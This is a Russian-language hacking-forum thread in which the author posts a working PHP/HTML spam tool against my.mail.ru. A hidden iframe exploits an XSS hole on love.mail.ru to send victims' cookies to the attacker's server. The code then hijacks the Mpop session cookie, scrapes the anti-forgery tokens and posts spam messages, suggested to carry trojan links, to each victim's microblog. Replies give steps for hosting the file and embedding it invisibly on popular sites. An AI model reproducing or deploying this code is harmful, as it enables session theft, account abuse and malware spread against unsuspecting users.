Спамер my.mail.ru с помощью XSS и iframe ру трафа

​

Написал тут не большой спамер с помощью атаки CRSF (Сross Site Request Forgery — «Подделка межсайтовых запросов»).
Требуется только XSS Mail.ru и РУ iframe трафик.

Описание:
С помощью XSS Mail.ru крадуться cookie
обрезается Mpop и его значение от мусара
далее cookie вносятся в cURL чтобы загрузилась страница пользователя
с исходника страницы парсятся два важных значения mna,mnb без них сообщения не шлются
потом составляется ссылка из месаги,mna,mnb и срабатывает GET запрос отсылая нашу месагу в микроблог юзера)

Так вот если толкнуть этот файл в iframe какого-нибудь посещаемого ру сайта, то проспамится ваша месага хорошо) Ченить типо "Ваххахах коры http://troyan.com зацените все" и в Мой Мире же много друзей и вылезает у всех, как бы одна месага многих зацепит))

Вообщем вот код:

Code:

<?
$message = 'Hello World!';
$xss = 'http://love.mail.ru/support.phtml?s_post=xMPkdBsopK2S2uzEJ0CBetWAyGRbWMLd&query=';
$host = 'http://localhost';
function mpop_salt($mpop_s) { 
    $p1 = strpos($mpop_s, 'Mpop=');
    $p2 = strpos($mpop_s, ';', $p1);
    $mpop = substr($mpop_s, $p1, $p2-$p1);
    return $mpop;
}
function GetSource($cookie) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL,"http://my.mail.ru");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_GET, 1);
    curl_setopt($ch, CURLOPT_COOKIE, $cookie);
    $zz = curl_exec($ch);
    curl_close($ch);
    return $zz;
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />
<title></title>
</head>
<body>
<?
if (!isset($_GET['id'])) {
?>
<iframe style="display:none" src='<? echo($xss); ?>%22%3E%3Cscript+type=%22text/javascript%22%3Elocation.href+=+%22<? echo($host); ?>/index.php?id=%22+%2B+document.cookie%3C%2Fscript%3E>'></iframe>
<?
} else {
    $id = $_GET['id'];
    $cookie = mpop_salt($id);
	$text = GetSource($cookie);
	$p1 = strpos($text, 'name="mna" value="')+18;
	$p2 = strpos($text, '">', $p1);
	$mna = substr($text, $p1, $p2-$p1);
	$p1 = strpos($text, 'name="mnb" value="')+18;
	$p2 = strpos($text, '">', $p1);
	$mnb = substr($text, $p1, $p2-$p1);
	?>
    <meta http-equiv='refresh' content='0;url=http://my.mail.ru/cgi-bin/my/ajax?ajax_call=1&func_name=perl_send_micropost&data=["<? echo($message); ?>", 0, 0, 1, "<? echo($mna); ?>", "<? echo($mnb); ?>", ""]'>
    <?
}
?>
</body>
</html>

А лучше скачать файл, а то ачат пробелы ставит.
Видео-Ролик как работает спамер) 46Mb




P/S
Вот теперь можно на фейки гнать траф) А то надоели этими брут акками торгуют которые каждый день от и до спамят и еще такие селлеры пишут "у меня ЧИСТЫЕ акки".

 

довольно интересно

 

сделай по подробнее.. у понял так..

смотри копирую текст в nah.html

Далее захожу на эту страницу,кидает:

Code:

http://my.mail.ru/cgi-bin/my/ajax?ajax_call=1&func_name=perl_send_micropost&data=[%22%3C?%20echo($message);%20?%3E%22,%200,%200,%201,%20%22%3C?%20echo($mna);%20?%3E%22,%20%22%3C?%20echo($mnb);%20?%3E%22,%20%22%22]

И на странице пишет:

Code:

["AjaxResponse","OK","micropost_ratelimit_exceeded","",0,""]

Правильно? это же после этого спам по листу друзей пошел или как?

Как мне аккаунт взломать,что нужно сделать?

 

Не надо нечего выкавыривать)
берешь файл тот с архива index.php переименовываешь как тебе понравится но если переименуешь не забудь тут тоже поменять
<iframe style="display:none" src='<? echo($xss); ?>%22%3E%3Cscript+type=%22text/javascript%22%3Elocation.href+=+%22<? echo($host); ?>/index.php?id=%22+%2B+document.cookie%3C%2Fscript%3 E>'></iframe>

потом берешь этот файл уже залитый на сайт выглядит типо http://127.128.129.130/files/index.php
и толкаешь куданибудь на юкоз можно в виде
<iframe src="http://127.128.129.130/files/index.php" style="display:none"></iframe>

Главно что бы на твоем http://127.128.129.130 была поддержка php и cURL

Залил видео смотрим в топике

 

тема интересная)...
жаль,ХССку спалят и пофиксят,наверн

 

смысл тему палить? даже неотплюсуют, а результат будет один - увелечение безопасности майла.ру,
если за это возьмётся грамотный человек, кое что переделает по своему... привяжут куки к ип и всё

 

Куки к ипу точно не привяжут, незнаю почему не привязывают значит есть причина)
Само чо они могут изменить это ссылку в алерт толкнуть или эти значения mna,mnb сделать чтобы генерировались на месте ну типо как авторизация на сайте Skype, там вообще хз как она работает. Это так догадки) И это все обойти можно.

 

что то не работает уже хсска наверно (
а жаль (

 

неплохо земляк